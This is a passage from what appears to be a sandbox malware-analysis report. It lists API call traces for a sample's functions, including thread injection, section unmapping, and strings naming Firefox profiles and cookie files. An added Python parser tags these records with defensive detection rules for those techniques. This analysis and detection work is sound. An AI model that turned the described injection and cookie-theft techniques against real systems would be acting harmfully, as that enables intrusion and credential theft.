    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
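Several records in this section share API clusters that an analyst reads as techniques: the ResumeThread / WaitForSingleObject(00000064) / SuspendThread subcalls beside memcpy(?,CCCCFEEB,...) and NtUnmapViewOfSection near the top of the section, the CreateToolhelp32Snapshot / Thread32First / OpenThread / QueueUserAPC record, the paired VirtualProtect calls whose third argument is 00000040, the %APPDATA%\Mozilla\Firefox\Profiles / \cookie.ff / \cookie.ie record, and the GET / POST / PUT string record directly above. What follows is an added example, not part of the Joe Sandbox report and not the sample's own code: a small Python parser for the bullet-line format used on this page that collects each record's direct and subcall APIs plus its String ID entries and tags them with hand-written rules. The rule names and the API sets behind them are this example's assumptions, and so is the reading of the memcpy argument: 0xCCCCFEEB stored little-endian is the byte sequence EB FE CC CC, where EB FE is `jmp short $` (a two-byte loop on itself) and CC is int3 padding, which is why a resume-wait-suspend sequence next to it is tagged as a parked thread. The report only shows the argument value, so that interpretation is an inference, not something the page states.

```python
"""Tag sandbox function records by the Win32 API clusters they call.

Added example, not part of the Joe Sandbox report or the analysed sample. It
parses the bullet lines in this page's format ("• Api.MODULE(args), ref: ADDR"
and "• Part of subcall function F: ...") plus the "String ID:" line and applies
hand-written rules; rule names, API sets and the 0xCCCCFEEB reading are assumptions.
"""
import re
from typing import Dict, List, Set

_CALL_RE = re.compile(
    r"(?P<sub>Part of subcall function [0-9A-F]+: )?"  # optional subcall prefix
    r"(?P<api>\w+)\.(?P<mod>\w+)"                      # Api.MODULE
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
_STRING_RE = re.compile(r"String ID:\s*(?P<ids>.*)")
# A rule fires when every listed API occurs in the record, directly or via a subcall.
API_RULES = {
    "apc_injection": {"CreateToolhelp32Snapshot", "Thread32First", "OpenThread", "QueueUserAPC"},
    "section_unmap_hollowing": {"NtUnmapViewOfSection", "ResumeThread", "SuspendThread"},
}
RWX = "00000040"  # VirtualProtect flNewProtect == PAGE_EXECUTE_READWRITE

def parse_record(text: str) -> Dict[str, List[dict]]:
    """Calls of one record as 'direct', 'subcall' and 'all' (line order)."""
    calls: Dict[str, List[dict]] = {"direct": [], "subcall": [], "all": []}
    for line in text.splitlines():
        m = _CALL_RE.search(line) if "ref:" in line else None
        if not m:
            continue
        entry = {"api": m.group("api"), "module": m.group("mod"), "ref": m.group("ref"),
                 "args": [a for a in (m.group("args") or "").split(",") if a]}
        calls["subcall" if m.group("sub") else "direct"].append(entry)
        calls["all"].append(entry)
    return calls

def parse_string_ids(text: str) -> List[str]:
    """Strings on the 'String ID:' line are '$'-separated in this report format."""
    m = _STRING_RE.search(text)
    return [s for s in m.group("ids").split("$") if s] if m else []

def has_ordered_sequence(calls: List[dict], seq) -> bool:
    """True if the APIs in `seq` appear in that order, not necessarily adjacent."""
    names = iter(c["api"] for c in calls)
    return all(any(n == want for n in names) for want in seq)

def immediate_bytes(hex_word: str) -> bytes:
    """A 32-bit argument value as the little-endian bytes it occupies in memory."""
    return int(hex_word, 16).to_bytes(4, "little")

def is_spin_stub(b: bytes) -> bool:
    """EB FE is `jmp short $`, a two-byte loop on itself; CC (int3) is padding."""
    return b[:2] == b"\xeb\xfe"

def spin_stub_immediates(text: str) -> List[tuple]:
    """(api, value) pairs for argument values that decode to a self-jump stub."""
    return [(c["api"], a) for c in parse_record(text)["all"] for a in c["args"]
            if re.fullmatch(r"[0-9A-F]{8}", a) and is_spin_stub(immediate_bytes(a))]

def tag_record(text: str) -> Set[str]:
    """Technique tags for one record; the tag names are this example's own."""
    calls = parse_record(text)["all"]
    apis = {c["api"] for c in calls}
    tags = {name for name, needed in API_RULES.items() if needed <= apis}
    # Resume, wait, suspend: the thread is parked on a stub before its memory is rewritten.
    if has_ordered_sequence(calls, ("ResumeThread", "WaitForSingleObject", "SuspendThread")):
        tags.add("thread_park")
    if any(c["api"] == "VirtualProtect" and c["args"][2:3] == [RWX] for c in calls):
        tags.add("rwx_protect_toggle")
    strings = parse_string_ids(text)
    if any("Firefox\\Profiles" in s or s.startswith("\\cookie.") for s in strings):
        tags.add("browser_cookie_theft")
    if {"GET ", "POST", "PUT"} & set(strings):
        tags.add("http_request_parsing")
    return tags

# Constructed inputs: lines copied from records on this page, argument lists trimmed.
SAMPLE_PARK = r"""
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9), ref: 01B31E2F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004), ref: 01B3240D
"""
SAMPLE_APC = r"""
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
"""
SAMPLE_COOKIE = r"""
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
"""
SAMPLE_PATCH = r"""
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000), ref: 001D7865
"""
```

Feed tag_record one record at a time (everything between consecutive "Similarity" headings); tag_record(SAMPLE_PARK) yields section_unmap_hollowing and thread_park, and spin_stub_immediates(SAMPLE_PARK) points at the memcpy whose source argument decodes to the EB FE stub. Two caveats a practitioner should keep in mind: the rules match on API name only, because the report attributes the same call to KERNEL32, KERNELBASE or NTDLL depending on where it resolved, and "Part of subcall function" lines mean a tag can fire on a caller because of what its callee does, so a hit identifies a record to read, not a verdict on it.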
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
